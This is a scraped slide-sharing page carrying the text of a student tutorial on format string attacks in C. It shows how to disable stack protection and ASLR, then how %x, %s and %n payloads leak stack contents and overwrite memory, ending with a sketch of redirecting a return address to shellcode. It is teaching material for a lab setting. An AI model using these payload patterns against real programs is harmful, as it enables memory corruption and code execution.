[若渴]Study on Side Channel Attacks and Countermeasures
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code
 
[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache
 
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
 

Recently uploaded

The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
CANSA The Cancer Association of South Africa
 
Best Way to Overcome Procrastination and Increase Productivity.pdf
Best Way to Overcome Procrastination and Increase Productivity.pdfBest Way to Overcome Procrastination and Increase Productivity.pdf
Best Way to Overcome Procrastination and Increase Productivity.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
Understanding of Self - Applied Social Psychology - Psychology SuperNotes
Understanding of Self - Applied Social Psychology - Psychology SuperNotesUnderstanding of Self - Applied Social Psychology - Psychology SuperNotes
Understanding of Self - Applied Social Psychology - Psychology SuperNotes
PsychoTech Services
 
Strategies to rekindle the fire inside you and stay motivated.pdf
Strategies to rekindle the fire inside you and stay motivated.pdfStrategies to rekindle the fire inside you and stay motivated.pdf
Strategies to rekindle the fire inside you and stay motivated.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
aula open english sobre Classic-motorcycles-2_1.pdf
aula open english sobre Classic-motorcycles-2_1.pdfaula open english sobre Classic-motorcycles-2_1.pdf
aula open english sobre Classic-motorcycles-2_1.pdf
PauloVictor90882
 
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotesProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
PsychoTech Services
 
The Six Working Genius Short Explanation
The Six Working Genius Short ExplanationThe Six Working Genius Short Explanation
The Six Working Genius Short Explanation
abijabar2
 
Aggression - Applied Social Psychology - Psychology SuperNotes
Aggression - Applied Social Psychology - Psychology SuperNotesAggression - Applied Social Psychology - Psychology SuperNotes
Aggression - Applied Social Psychology - Psychology SuperNotes
PsychoTech Services
 

Recently uploaded (8)

The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
The Secret Warrior - Help Share a Parent or Loved Ones’ Cancer Diagnosis with...
 
Best Way to Overcome Procrastination and Increase Productivity.pdf
Best Way to Overcome Procrastination and Increase Productivity.pdfBest Way to Overcome Procrastination and Increase Productivity.pdf
Best Way to Overcome Procrastination and Increase Productivity.pdf
 
Understanding of Self - Applied Social Psychology - Psychology SuperNotes
Understanding of Self - Applied Social Psychology - Psychology SuperNotesUnderstanding of Self - Applied Social Psychology - Psychology SuperNotes
Understanding of Self - Applied Social Psychology - Psychology SuperNotes
 
Strategies to rekindle the fire inside you and stay motivated.pdf
Strategies to rekindle the fire inside you and stay motivated.pdfStrategies to rekindle the fire inside you and stay motivated.pdf
Strategies to rekindle the fire inside you and stay motivated.pdf
 
aula open english sobre Classic-motorcycles-2_1.pdf
aula open english sobre Classic-motorcycles-2_1.pdfaula open english sobre Classic-motorcycles-2_1.pdf
aula open english sobre Classic-motorcycles-2_1.pdf
 
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotesProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
ProSocial Behaviour - Applied Social Psychology - Psychology SuperNotes
 
The Six Working Genius Short Explanation
The Six Working Genius Short ExplanationThe Six Working Genius Short Explanation
The Six Working Genius Short Explanation
 
Aggression - Applied Social Psychology - Psychology SuperNotes
Aggression - Applied Social Psychology - Psychology SuperNotesAggression - Applied Social Psychology - Psychology SuperNotes
Aggression - Applied Social Psychology - Psychology SuperNotes
 

[MOSUT] Format String Attacks

  • 2. About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
  • 3. Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
  • 4. Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
  • 6. A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
  • 7. Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
  • 8. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
  • 9. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
  • 10. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
  • 11. Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
  • 12. Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
  • 13. Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
  • 14. So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
  • 15. You can overwrite arbitrary memory, if there are format string vulnerabilities
  • 16. Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf